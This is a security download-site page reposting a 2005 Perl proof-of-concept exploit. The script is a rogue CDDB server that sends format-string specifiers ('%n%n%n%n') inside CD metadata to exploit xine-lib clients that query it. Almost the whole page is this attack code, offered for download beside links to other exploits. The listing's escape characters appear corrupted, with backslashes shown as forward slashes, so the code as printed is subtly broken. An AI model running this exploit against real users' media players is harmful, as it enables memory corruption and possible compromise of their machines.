xine-lib CDDB Client Metadata Handling Remote Format String Exploit

| 网站首页 | 模板 | 资料 | 源码 | 工具 | 开发 | 设计 | 安全 | 项目 | 网络 | 图片 | 系统 | 数据库 | 博客 | 会员中心 | 小说 |

网络学院

学习资料

源码模版

您现在的位置：精品下载 >> 安全 >> 网络安全 >> 安全中心正文

用户登录

新用户注册

xine-lib CDDB Client Metadata Handling Remote Format String Exploit

【字体：小大】

xine-lib CDDB Client Metadata Handling Remote Format String Exploit

作者：佚名安全中心来源：不详点击数：更新时间：2007-10-10

#!/usr/bin/perl

# xine-cddb-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 8880;
$main::timeout = 5;

# *** SUBROUTINES ***

sub mysend($$)
{
my $file = shift;
my $str = shift;

print $file "$str/n";
print "SENT: $str/n";
} # sub mysend

sub myreceive($)
{
my $file = shift;
my $inp;

eval
{
local $SIG = sub { die "alarm/n" };
alarm $main::timeout;
$inp = <$file>;
alarm 0;
};

if ($@ eq "alarm/n") { $inp = ''; print "TIMED OUT/n"; }
$inp =~ tr//015/012/000//d;
print "RECEIVED: $inp/n";
$inp;
} # sub myreceive

# *** MAIN PROGRAM ***

{
my $server = IO::Socket::INET->new( Proto => 'tcp',
LocalPort => $main::port,
Listen => SOMAXCONN,
Reuse => 1);
die "can't set up server!/n" unless $server;

while (my $client = $server->accept())
{
$client->autoflush(1);
print 'connection from '.$client->peerhost."/n";

mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '.
scalar localtime);

while (my $str = myreceive($client))
{
if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i)
{
mysend($client, "200 Hello and welcome $1/@$2 running $3.");
next;
}

if ($str =~ m/^proto (/d+)$/i)
{
mysend($client, "201 OK, CDDB protocol level now: $1");
next;
}

if ($str =~ m/^cddb query ([0-9a-f]+)/i)
{
mysend($client, "200 rock $1 Exploiters / Formatted and Stringed");
next;
}

if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i)
{
my $docum = <<HERE;
210 $1 $2 CD database entry follows (until terminating /`.')
# %n%n%n%n
DISCID=$2
DTITLE=Exploiters / Formatted and Stringed
DYEAR=2005
DGENRE=Rock
TTITLE0=Format
TTITLE1=String
TTITLE2=Bug
EXTD= YEAR: 2005
EXTT0=
EXTT1=
EXTT2=
PLAYORDER=
.
HERE

$docum =~ s|/s+$||s;
mysend($client, $docum);
next;
}

if ($str =~ m/^quit$/i)
{
mysend($client, '230 metaur Closing connection. Goodbye.');
last;
}

mysend($client, '500 Unrecognized command.');
} # while str=myreceive(client)

close $client;
print "closed/n/n/n";
} # while client=server->accept()
}

安全中心录入：chqnet 责任编辑：chqnet

上一个安全中心： Microsoft Windows Wireless Zero Configuration Information Disclosure Exploit

下一个安全中心： phpMyAdmin grab_globals.lib.php Remote Directory Traversal Exploit

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关安全中心
				网管必备技巧—Windows日志的… 防范WinGate代理防火墙被攻击在Windows中密码设置的几个要… Windows 2000密码破解不完全… 密码攻防实战大演习之Window… 妙用Windows磁盘配额让黑客… 抵抗拒绝服务：巧妙修改Win2… Win 2000密码破解不完全指南教你如何:入侵UNIX和Linux服… 浅析Windows 2000/XP服务与后…

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）